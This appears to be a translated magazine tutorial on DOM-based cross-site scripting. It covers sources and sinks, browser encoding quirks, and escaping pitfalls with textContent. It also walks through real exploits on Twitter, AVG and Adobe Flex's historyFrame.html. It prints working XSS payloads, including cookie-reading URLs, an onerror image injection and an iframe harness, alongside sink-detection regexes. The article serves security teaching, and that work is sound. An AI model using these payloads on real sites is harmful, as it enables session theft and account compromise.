Finding Loopholes: DOM Based XSS Guide



XSS is at the top of the OWASP Top 10 list of threats for good reason. Any sensible programmer knows about it. Yet that does not change the statistics: eight out of ten web applications have XSS vulnerabilities. And if I recall my own experience of pentesting banks, "ten out of ten" looks closer to reality. The topic seems to have been covered from start to finish, yet there is a subtype of XSS that, for various reasons, tends to get lost: DOM Based XSS. That is what I am writing about today.

Focus shift

Attacks on clients are one of the major security challenges of the web. XSS, clickjacking, CSRF: all of them target ordinary users rather than server-side components. And while earlier one could profit handsomely by exploiting vulnerabilities in the server part (and getting inside the corporate network), attackers' focus is now shifting to the client side. For this reason XSS, which many are skeptical about, can serve an attacker well.

What you can skip

First, two notes about this article. The first: the main goal is to introduce DOM Based XSS to those who have so far passed this type of vulnerability by, to talk about the intricacies of exploitation, and to share thoughts on how to set up the process of finding such vulnerabilities properly. This is a kind of primer, so depending on what you already know you can skip one part or another. Now the second. It concerns the article "The whole truth about XSS, or why cross-site scripting is not a vulnerability?". It argued that XSS is just an attack, not a type of vulnerability. I remember that it sparked a series of fierce disputes and "crusades", which was very amusing... I will nevertheless call XSS both an attack and a vulnerability, although the statement "XSS is a type of attack" is the correct one. It is simpler that way, although understanding the distinction correctly is, of course, important.

XSS ABC

I cannot help recalling what we need XSS for. No, not just to execute our JavaScript code in the user's browser. For that we could simply lure the user to a website we fully control (http://evil.com).

The task is to execute OUR JavaScript code in the user's browser in the context of the attacked domain (for example, in the context of gmail.com). That is, the goal is to circumvent the Same Origin Policy, because almost all browser security rests on SOP.

Next, what does XSS give us? In the simplest case, of course, we just get the user's session cookies. But in fact we can do everything JavaScript can: control what is displayed on the page and what is sent to the server, emulate user actions, steal data from forms... It is important to understand that XSS, depending on the situation and on skill, can become a powerful weapon.

Now about classification. Usually "stored" XSS ("Type 2") and "reflected" XSS ("Type 1") are distinguished. With stored XSS, we send a payload, it is saved on the server, and then we direct users to the affected page. With reflected XSS, our payload comes back in the body of the server's response to a specific request that itself carries the XSS. But something is missing here. As you have probably guessed, it is today's topic: DOM Based XSS (or "Type 0"). For various reasons (some of which are described later) this type of XSS is little known, even in our circles... Perhaps because scanners often cannot detect it. But let's move on to theory.

What is DOM Based XSS?

To answer the question, you first need to understand what the DOM is. I'll start from afar, with a favorite topic: XML. There are two main types of XML parsers. The first, SAX (Simple API for XML), processes a document sequentially: it reads the document item by item and generates events. It needs few resources but is very basic. The second, DOM (Document Object Model), loads the entire document into memory and presents it as a tree. More importantly, it lets you manipulate that tree freely: you can add and delete nodes and change the structure, the elements (nodes) themselves and their attributes.

What does XML have to do with it? HTML is a close relative of XML (XHTML is HTML expressed as XML), and browsers use the same concept. Every HTML document received from the server is represented in the browser as a DOM tree, and it can be changed through a standard API from one language or another. In our case that is mainly JavaScript.

The DOM consists of hierarchically nested objects called nodes. Each node represents an HTML element on the page. The root element is document. The value stored in a node is text. Nodes also have attributes, which can be accessed as well. Fig. 1 shows the simplest HTML file together with the hierarchy the browser creates for it. You can read more about the DOM and try it out with JavaScript examples here: goo.gl/suiZE .
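Since the browser's DOM is not available outside a browser, the idea of a node hierarchy can be sketched with plain JavaScript objects. The page, the `node` helper and the `outline` function below are hypothetical and only model the tree; a real browser exposes the same kind of structure through `document`.

```javascript
// Hypothetical model of the tree a browser might build for:
// <html><head><title>Test</title></head><body><p id="msg">Hello</p></body></html>
function node(name, attributes, children) {
  return { name, attributes, children };
}

const tree = node("document", {}, [
  node("html", {}, [
    node("head", {}, [node("title", {}, [node("#text: Test", {}, [])])]),
    node("body", {}, [node("p", { id: "msg" }, [node("#text: Hello", {}, [])])]),
  ]),
]);

// Walk the tree depth-first and return one indented line per node.
function outline(n, depth = 0) {
  const attrs = Object.entries(n.attributes)
    .map(([key, value]) => ` ${key}="${value}"`)
    .join("");
  const line = "  ".repeat(depth) + n.name + attrs;
  return [line, ...n.children.flatMap((child) => outline(child, depth + 1))];
}

console.log(outline(tree).join("\n"));
```

Each level of indentation in the printed outline corresponds to one level of nesting, with the attribute of the `p` element shown next to its name.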


Fig. 1. The simplest DOM tree
As already mentioned, we can manipulate the DOM from JavaScript. What does this give us? In certain cases (when data is not filtered correctly) we can use these methods to modify the DOM of the attacked site and get our JavaScript code executed in its context. In essence it is the same XSS. The simplest example:

<body>
<script>document.write(location.href);</script>
</body>

After receiving this HTML, the browser executes the JavaScript code and appends a line to the page body (document.write), taking its value from location.href. The problem is that an attacker controls the value of location.href and can insert JavaScript of his own, which will also be executed. That is, if this page is test.html, then to inject our code we need the victim to follow this URL (see Fig. 2):

http://victim.com/test.html#<script>alert(document.cookie);</script>



Fig. 2. DOM Based XSS
Fig. 2.1. Classic DOM Based XSS
It is important to note that this example will not work in Firefox. In IE and Chrome the victim has to follow a link rather than type the script into the address bar, because in the latter case everything is URL-encoded before the code runs (it becomes "%3Cscript%3Ealert(1);%3C/script%3E"). The second example, however, works everywhere:

<body>
<script>
var l = location.hash.slice(1);
eval(l); 
</script>
</body>

Exploitation:

http://victim.com/test_eval.html#alert(document.cookie)
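For contrast, a page that only needs to pick one of a few known actions from the fragment does not need eval at all. The sketch below is one possible approach and is not part of the original example; the `actions` table and `runHashAction` are hypothetical names.

```javascript
// Hypothetical table of the only actions the page is willing to run.
const actions = {
  showInbox: () => "inbox shown",
  showSettings: () => "settings shown",
};

// Treat the fragment as a key into the table instead of as code.
function runHashAction(hash) {
  const key = hash.startsWith("#") ? hash.slice(1) : hash;
  // An own-property check avoids matching inherited names such as "constructor".
  if (!Object.prototype.hasOwnProperty.call(actions, key)) {
    return null; // unknown input is ignored, never evaluated
  }
  return actions[key]();
}

console.log(runHashAction("#showInbox"));              // inbox shown
console.log(runHashAction("#alert(document.cookie)")); // null
```

With this shape the exploit string from the URL above is simply an unknown key, because the source never reaches a code-evaluating sink.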

A slightly less standard XSS variant:

<body>
<p>Hello my window name is:
<script>document.write(window.name);</script>
</p>
</body>

Exploitation (we open the victim's page from our own page so that we control window.name), see Fig. 3:

<script>window.open("http://victim.com/test_window.html", "<script>alert('XSS')</scr" + "ipt>", "", false);</script>

I hope it is now clear where DOM XSS comes from.


Fig. 3. DOM Based XSS from window.name

Terminology?

Strange as it may seem, the attack itself is very old. As early as 2005, Amit Klein ( gomit.gl/OOb3U ) wrote a substantial paper about a third form of XSS, although DOM XSS itself had been found even earlier. His work listed where user data can come from (Fig. 4) and which dangerous functions can lead to XSS (Fig. 5). Oddly enough, though, the topic has been developed and rethought only in recent years, thanks in large part to people like Stefano Di Paola and Mario Heiderich.


Fig. 4. Where from…


Fig. 5. Where to…

Most importantly, a certain terminology has been worked out. What we control and can pass to the page is called a "source", and the end point the data arrives at, the dangerous functions through which we can attack and exploit our XSS, is called a "sink". I won't even try to find Russian equivalents for these terms. While the list of sinks has not changed much (a few were added), the understanding of sources has grown greatly, which slightly changes the understanding of the attack (its classification), but more on that later. It is important to understand what is what in principle, because there are too many details. That is why one of the key resources when digging into DOM XSS is the domxsswiki project ( goo.gl/yycvJ ), which lists the main sources and sinks together with their subtleties in various browsers.

Now, about the new classification that Aspect Security specialists recently presented (probably tongue in cheek), see Fig. 6. This classification is accurate and emphasizes the essence of DOM XSS. It does not matter where the attacker's input comes from (a particular server response, the client, the static part of the page); what matters is that the client side uses it in critical functions. For example, imagine that we can send our nickname to a server and it is stored there: there is potential for Stored XSS. But if filtering gets in our way, it would seem there is nothing more we can do. What if our nickname is also used somewhere else, on the client side, to modify the DOM? Then we get a second attempt at XSS (this time DOM XSS), because we may not need the characters that Stored XSS required and that the server filtered out.
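The nickname scenario can be sketched outside the browser. Everything here is an assumption made for illustration: `serverFilter` stands in for a server that strips angle brackets, `buildGreetingCode` for client code that builds a script string from the stored nickname, and `new Function` for a string-evaluating sink, called with harmless stand-in functions.

```javascript
// Hypothetical server-side filter: strips the angle brackets a Stored XSS would need.
function serverFilter(input) {
  return input.replace(/[<>]/g, "");
}

// Hypothetical client code that builds a script string from the stored nickname.
function buildGreetingCode(nickname) {
  return "greet('" + nickname + "');";
}

const payload = "');injected('"; // contains no < or >, so the filter passes it unchanged
const code = buildGreetingCode(serverFilter(payload));
console.log(code); // greet('');injected('');

// Evaluate the string the way a string-evaluating sink would, using harmless stand-ins.
const calls = [];
new Function("greet", "injected", code)(
  (name) => calls.push("greet:" + name),
  (name) => calls.push("injected:" + name)
);
console.log(calls); // [ 'greet:', 'injected:' ]
```

The second entry in `calls` shows that a statement chosen by the attacker ran, even though the filter did exactly what it was written to do.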


Fig. 6. New classification?


Fig. 7. The new version of source types changes the classification

Fig. 8. Where (new version) ...
What is the point of this part? To make it clear that there are important general concepts, but that DOM XSS is in many ways a very specific and non-trivial thing.

DOM XSS Specifics

So, after some general thinking on the topic and a few examples, what is specific to DOM XSS?

Firstly, DOM XSS is primarily a problem of the client side of the web application. To clarify: this is not a problem of the client, but of the client part of the application. It is incorrect filtering or use of data received from untrusted sources in the client part of the web application, that is, mainly in JavaScript. This has several consequences. DOM XSS can be on "any" page, even a plain HTML one, if JavaScript is used there. Previously, vulnerability searches focused on server scripts, on pages where we could enter some data and on pages where we got the result back, while static pages were of no interest. Now even "static" pages can carry a vulnerability.

Quite often DOM XSS does not require sending the payload to the server at all. The three examples above prove this. For the first two, it is important to note that browsers (per the standards) do not send the part after the "#" symbol to the server. This fragment identifier is a special part of the URI, originally used to link to parts of a document. The Wiki example: "http://www.example.org/foo.html#bar" refers to the element with id=bar on the foo.html page. The trick is that the fragment is not sent to the server but is accessible from JavaScript. Such identifiers are used constantly on web 2.0 sites (Gmail is one example). So the URL from the first example makes the browser request test.html without the XSS payload, while JavaScript still sees the full string. And no server-side protection (filtering of user data, any kind of WAF or IPS) will help. The problem lies mainly with the client side of the web application. That is the first point.

Secondly, we generally cannot use the standard techniques and tools that we use to find classic XSS and SQL injections, since they are designed to find server-side problems.

Thirdly, although we do have access to the source code (the JavaScript is delivered to the client), searching for such vulnerabilities correctly and thoroughly is a very non-trivial task. There are subtleties and tricks by the shovelful :).
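The point about the fragment never reaching the server can be checked with the standard URL class. This is a minimal sketch; `splitForRequest` is a hypothetical helper, and the URL is the one from the eval example earlier in the article.

```javascript
// Split a URL into the part sent in the HTTP request and the part that stays in the browser.
function splitForRequest(urlString) {
  const url = new URL(urlString);
  return {
    sentToServer: url.pathname + url.search, // request target: the fragment is not included
    visibleToScript: url.hash.slice(1),      // the fragment, as client-side script can read it
  };
}

const parts = splitForRequest("http://victim.com/test_eval.html#alert(document.cookie)");
console.log(parts.sentToServer);    // /test_eval.html
console.log(parts.visibleToScript); // alert(document.cookie)
```

Anything that inspects only the request (server-side filters, a WAF, an IPS) sees the first value and never the second.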

Difficulties and Tricks

Continuing the last point, here is a telling picture from Stefano Di Paola's presentation (Fig. 9). Parsing JavaScript is a terrible thing, especially with standard tools. True, Mario Heiderich wrote two regexps to identify the main sinks and sources:

/((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/

/(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/
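As a rough illustration of how the two expressions might be applied, the sketch below runs them over short code snippets. The regexes are copied verbatim from above; the names `sinkPattern`, `sourcePattern` and `triage` are hypothetical, and it is an assumption that the first expression targets sinks and the second sources, in the order the text names them.

```javascript
// The two expressions quoted above, copied verbatim.
const sinkPattern = /((src|href|data|location|code|value|action)\s*["'\]]*\s*\+?\s*=)|((replace|assign|navigate|getResponseHeader|open(Dialog)?|showModalDialog|eval|evaluate|execCommand|execScript|setTimeout|setInterval)\s*["'\]]*\s*\()/;
const sourcePattern = /(location\s*[\[.])|([.\[]\s*["']?\s*(arguments|dialogArguments|innerHTML|write(ln)?|open(Dialog)?|showModalDialog|cookie|URL|documentURI|baseURI|referrer|name|opener|parent|top|content|self|frames)\W)|(localStorage|sessionStorage|Database)/;

// Report whether a snippet contains anything either expression flags.
function triage(snippet) {
  return {
    hasSink: sinkPattern.test(snippet),
    hasSource: sourcePattern.test(snippet),
  };
}

console.log(triage("var l = location.hash.slice(1); eval(l);")); // { hasSink: true, hasSource: true }
console.log(triage("var total = 1 + 2;"));                       // { hasSink: false, hasSource: false }
```

A hit only marks a line worth reading; it says nothing about whether the flagged source actually reaches the flagged sink.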

But you still have to trace the entire data flow to understand where the data comes from, where it goes and how it gets there... On top of that, besides finding a potential DOM XSS vulnerability, you also need to write an exploit for it. And browsers differ and, worse, behave differently. Not to mention that browsers have defenses against reflected XSS, and those have to be circumvented too. Take the first example and the value in location.href: it holds a URL of this general form:

scheme://user:pass@host/path/to/page.ext/Pathinfo;semicolon?search.location=value#hash=value&hash2=value2

Browsers also URL-encode the parts of a URL differently. Firefox, for example, encodes the <> characters after #, but IE does not.

IE:

http://host/path/to/page.ext/test%3Ca%22'%0A%60=%20+%20%3E;test%3Ca%22'%0A%60=%20+%20%3E?test<a"'%0A`=%20+%20>;#test<a"'%0A`=%20+%20>;

Firefox:

http://host/path/to/page.ext/test%3Ca%22%27%0A%60=%20+%20%3E;test%3Ca%22%27%0A%60=%20+%20%3E?test%3Ca%22%27%0A%60=%20+%20%3E;#test%3Ca%22%27%0A%60=%20+%20%3E; 
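Why the encoding matters for the exploit can be shown in a few lines. In this sketch `encodeURIComponent` is only a stand-in for a browser that percent-encodes the fragment; real browsers encode a different set of characters, as the two URLs above show.

```javascript
const payload = "<script>alert(1)</script>";

// Stand-in for a browser that percent-encodes what follows "#".
const encoded = encodeURIComponent(payload);
console.log(encoded); // %3Cscript%3Ealert(1)%3C%2Fscript%3E

// A page that writes the encoded string emits no tag at all...
console.log(encoded.includes("<")); // false

// ...while a page that decodes it first gets the original markup back.
console.log(decodeURIComponent(encoded) === payload); // true
```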

Therefore, the first attack works only in IE and Chrome. However, if the vulnerable page contained the code

 
then the exploit would work in all browsers, since Firefox stores the value of that object in decoded form. Next, another example of browser tricks. Suppose there is a vulnerable page that adds only the server name from the referer to a script:

document.write('<script src="http://Host/image.gif?t=' + (document.referrer.split("/")[2]) + '"></script>');
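To see which part of the referrer that expression picks out, the split can be run on its own. `hostFromReferrer` and the example referrer URL are hypothetical.

```javascript
// Extract the host the way the vulnerable snippet does: the third piece of a "/" split.
function hostFromReferrer(referrer) {
  return referrer.split("/")[2];
}

// Hypothetical referrer produced by a redirect from an attacker-controlled site.
console.log(hostFromReferrer("http://sub.attacker.example/redirect.html")); // sub.attacker.example
```

Only the host name survives, so whatever an attacker wants to inject has to fit inside it.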

What can be done here, it would seem? Well, we can influence the referer! All we need is to lure the user to our site and redirect him from a page of our choosing to the vulnerable one. That way we control the referer field. But since only the host name is taken, it looks like a dead end... But no. Stefano found that IE supports special characters in the host name. That is, we can create a subdomain of our own “.evil.com” or, as in Stefano's example, “" onreadystatechange=eval(name) .attacker.com”.

In addition to browser quirks and the differences in native JavaScript code, there are all kinds of JS frameworks, which are used practically everywhere. jQuery alone has many wrappers over the standard sinks (see Fig. 10).


Fig. 9. Analyzing JavaScript is a thankless task


Fig. 10. jQuery and other frameworks make analysis even more difficult

Bypass filters

Hopefully an understanding of DOM XSS has begun to emerge. Now let us touch briefly on protection. Of course, the simplest option is to abandon JS on the client side :). But that is clearly unrealistic. The next option is to use only safe functions for changing the DOM and to filter user data... But, as you have probably noticed, DOM XSS is quite a topic. It is a kind of multi-colored bubbling entity with no clear borders. So there is no solid common understanding of it, and as a result many mistakes are made in defenses. Not long ago I read an excellent article, which we will now go through. It describes two examples of "safe" DOM changes that rely on filtering user data. Example 1: using element.textContent, which sets or reads the text value of a node. It is also used to filter HTML. For instance:

var div = document.createElement('div');
div.innerHTML = 'Hello <a href="http://bob.com">Bob</a>!';
// textContent returns only the text of the node and its children
console.log(div.textContent);
// Hello Bob!

Here div.textContent dropped the <a> tag around "Bob" and kept only the text. So it seems safe, and we cannot slip in an XSS payload? Not quite. This approach has a peculiarity: it converts HTML entities back into HTML characters:

var div = document.createElement('div');
div.innerHTML = 
  'Hello <a>&lt;script&gt;alert(&quot;!&quot;)&lt;/script&gt;</a>!';
console.log(div.textContent);
// Hello <script>alert("!")</script>!

That is, with a little trickery we can still get XSS through. If the method is used the other way around

var div = document.createElement('div');
div.textContent = '<span>Foo & bar</span>';
console.log(div.innerHTML)
// &lt;span&gt;Foo &amp; bar&lt;/span&gt;

the result, again, appears completely safe: the characters <, > and & were replaced with the corresponding entities. The author notes that document.createTextNode behaves similarly, and this method is also used for "filtering". But you have probably noticed that one important character is missing from this filtering: the quote. Classic XSS theory reminds us that this leaves room for event-based XSS, which the author demonstrates with an example:

// "Escapes" a string by letting the DOM serialize a text node
function escapeHtml(str) {
    var div = document.createElement('div');
    div.appendChild(document.createTextNode(str));
    // innerHTML escapes <, > and &, but leaves quotes untouched
    return div.innerHTML;
}
var userWebsite = '" onmouseover="alert(\'derp\')" "';
var profileLink = '<a href="' + escapeHtml(userWebsite) + '">Bob</a>';
var div = document.getElementById('target');
div.innerHTML = profileLink; // the injected quote closes href and adds an event handler
// <a href="" onmouseover="alert('derp')" "">Bob</a>
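One way to close this particular gap is to escape quotes as well. The function below is a minimal sketch, not the article author's code; `escapeHtmlStrict` is a hypothetical name, and it works on plain strings so it does not need the DOM.

```javascript
// Escape every character that can break out of HTML text or a quoted attribute value.
function escapeHtmlStrict(str) {
  const entities = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(str).replace(/[&<>"']/g, (ch) => entities[ch]);
}

const userWebsite = '" onmouseover="alert(\'derp\')" "';
const profileLink = '<a href="' + escapeHtmlStrict(userWebsite) + '">Bob</a>';
console.log(profileLink);
// <a href="&quot; onmouseover=&quot;alert(&#39;derp&#39;)&quot; &quot;">Bob</a>
```

The payload now stays inside the href value. Escaping alone does not make an arbitrary href safe, though: a value starting with javascript: would still need a separate check.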

Oddly enough, the problem spreads and "flows" into other solutions. For example, jQuery's .text() has the same peculiarities. Some further information on filtering can be found in domxsswiki.

Reality

A couple of examples. First, the classic one found on Twitter, where the XSS, oddly enough, was trivial:

http://twitter.com/#!javascript:alert(document.domain);
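What a page might do with such a URL can be modelled roughly as follows. This is an assumption for illustration, not Twitter's actual code: `hashbangTarget` takes whatever follows "#!" as a navigation target, and `isSafeTarget` is one possible guard that accepts only same-site paths.

```javascript
// Take everything after "#!" as the navigation target (modelled on the URL above).
function hashbangTarget(href) {
  const target = href.split("#!")[1];
  return target === undefined ? null : target;
}

// One possible guard: accept only same-site paths such as "/user/status".
function isSafeTarget(target) {
  return typeof target === "string" && target.startsWith("/") && !target.startsWith("//");
}

const target = hashbangTarget("http://twitter.com/#!javascript:alert(document.domain);");
console.log(target);               // javascript:alert(document.domain);
console.log(isSafeTarget(target)); // false
```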

The javascript: pseudo-protocol is substituted into location and, as a result, our code is executed. A more recent example, from the AVG website:

//display the correct tab based on the url (#name)
var pathname = $(location).attr('href');
var urlparts = pathname.split("#");

Exploitation is again trivial:

http://www.avg.com/eu-en/download#"><img src=x onerror=prompt(/xss/);>

Next, a slightly stranger example, where the vulnerability seems close at hand but is not easy to exploit. It was found in Adobe Flex 3. The vulnerable page, /history/historyFrame.html, is still widely deployed on the Web (including on "major" portals).

function processUrl() 
{
        var pos = url.indexOf("?");
        url = pos != -1 ? url.substr(pos + 1) : "";
        if (!parent._ie_firstload) {
            parent.BrowserHistory.setBrowserURL(url);
            try {
                parent.BrowserHistory.browserURLChange(url);
            } catch(e) { }
        } else {
            parent._ie_firstload = false;
        }
}

var url = document.location.href;
processUrl();
document.write(url);

Looking at the last lines, the XSS seems to be served on a silver platter. But there is a problem: the check of parent._ie_firstload in the processUrl function. The vulnerability cannot be exploited directly, because the JavaScript simply never reaches the right place. Since the page has no suitable parent object, JavaScript crashes at "parent.BrowserHistory.setBrowserURL(url);". But we can cheat and create a page on our own site containing two frames:

<html>
 <body>
  <iframe name="_ie_firstload"></iframe>
  <iframe src="http://www.vuln.site/app/history/historyFrame.html?#<script>alert('xss')</script>"></iframe>
 </body>
</html>

This way we create a frame that the vulnerable page's code finds when it evaluates "if (!parent._ie_firstload)". Since the object now exists, execution goes to the else branch and the function completes successfully, which lets the DOM XSS fire. This method has its own subtleties, though. For example, FF forbids accessing parent from another domain, so in the author's experience it could be used only against IE. If you are interested in DOM XSS, be sure to look at other examples to gain experience: goo.gl/ZWei3 , goo.gl/gZawa , goo.gl/XRwBT , goo.gl/plqs9 .
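Returning to the historyFrame.html example, the control flow can be modelled outside the browser. This is a simplified sketch: the page URL and the parent window are passed in as arguments, the inner try/catch call is left out, and a plain object stands in for the named iframe.

```javascript
// Model of processUrl with the page URL and the parent window passed in explicitly.
function processUrl(href, parent) {
  const pos = href.indexOf("?");
  const url = pos !== -1 ? href.slice(pos + 1) : "";
  if (!parent._ie_firstload) {
    // Throws a TypeError when parent has no BrowserHistory object.
    parent.BrowserHistory.setBrowserURL(url);
  } else {
    parent._ie_firstload = false;
  }
  return url; // the value the page would go on to pass to document.write
}

const href = "http://www.vuln.site/app/history/historyFrame.html?#<script>alert('xss')</script>";

// Opened directly: nothing named _ie_firstload or BrowserHistory exists.
let crashed = false;
try {
  processUrl(href, {});
} catch (e) {
  crashed = e instanceof TypeError;
}
console.log(crashed); // true

// Opened from the attacker's page: the named iframe makes parent._ie_firstload truthy.
console.log(processUrl(href, { _ie_firstload: {} })); // #<script>alert('xss')</script>
```

In the first case the script stops before document.write is ever reached; in the second the payload after "?" comes through intact.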

Afterword

I may be repeating myself, but to sum up: DOM Based XSS is a strange beast. And the more obscurity and subtlety, the more bugs, especially as JavaScript keeps "pulling the blanket over itself" and the web becomes ever more dynamic. In general, learning is light, and creating is wonderful :). Happy researching!


First published in "Hacker" magazine, issue 05§ 2.1.
